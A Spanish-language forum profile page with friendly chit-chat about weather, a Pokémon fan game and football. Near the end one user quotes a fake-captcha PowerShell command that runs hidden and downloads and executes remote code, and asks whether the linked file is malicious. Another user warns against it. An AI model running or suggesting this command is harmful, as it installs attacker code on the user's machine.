Nuevos mensajes de perfil

Te doy la bienvenida al foro (⚆ᴗ⚆)

Veo que entiendes de Pixel Art, ¿has pensado en traer muestras de tu trabajo?
Hola mi amigo, ya llegó el verano (⚆ᴗ⚆)
utsur0id
utsur0id
¡Hola! Que suerte, acá en mi hemisferio, el frío polar nos acecha xD
M_Alighieri
M_Alighieri
Oh, pues a mí me encanta el frío, ¿nieva por allá?
utsur0id
utsur0id
No aún, pero no me extrañaría cualquiera de estos días. Llueve si, bastante
qué opinas del pkmn reloaded?
Draiii
Draiii
sinceramente me parece increíble, tenía rato sin jugarlo, hace poco lo retomé y la verdad fue de las mejores decisiones que he tomado. es una joyita, deberías probarlo actualmente
M_Alighieri
M_Alighieri
Sí, tal vez, debe haber recibido muchas mejoras y nuevos detalles en todo este tiempo.

A menudo me cuesta encontrar tiempo o motivación para empezar cosas nuevas, la verdad, y es una pena, la experiencia es muy agradable de media, pero tengo submundos, rutinas y preocupaciones recurrentes que me ponen a prueba...
Draiii
Draiii
oye sí, te entiendo. yo estaba igual, "afortunadamente" por cosas de la vida tengo algo de tiempo libre estos dias y pude darle un chance.

si algún día te libras y estas aburrido o algo, metele un rato al reloaded, al principio puede ser algo aburrido pero con el tiempo se pone adictivo(ayuda).
¡¡Ha vuelto!! (⚆ᗝ⚆)
Lon
Lon
Mmmmmmmmmmmmmmmmmmmh ¿Quién eres? (Sowy djfjf)
No he vuelto, sólo estoy de paso. Mucho tiene que cambiar la cosa jaja.
M_Alighieri
M_Alighieri
Me conocen como Helix Boo, también como Lord Kaktus.

¿Qué cambios tendría que haber? (⚆ᗝ⚆)
Howdy hi!
  • Me gusta
Reacciones : Fossilmaniac06
Fossilmaniac06
Fossilmaniac06
!IH ydwoH buenas tardes o noches, como van las predicciones del mundial. 🤔
M_Alighieri
M_Alighieri
Ni lo sé, ni me importa, no me gusta el fútbol profesional. ¿Tú lo sigues?
Fossilmaniac06
Fossilmaniac06
.....pues no soy tan aficionado, solo veo la final de la copa del mundo. Una pregunta son legibles los post hasta ahora????, porque voy a hacer una revisión, de algunos post....✍
este link es malicioso?: //memoryresources.de/DNS/DNS.zip
Lo digo por que el captcha que me salio me pedia ejecutar un comando en la terminal, es este:
powershell -w h "iex(irm 'idverification-cdn.info/d1dc7c6834dbcee9' -UseBasicParsing)"; exit <#Verification ID: d1dc7c6834dbcee9#>
si alguien puediera resolver mi duda lo agradeceria.
gracias.
M_Alighieri
M_Alighieri
Busca otro enlace, las descargas online nunca deberían pedirte que ejecutes ningún comando.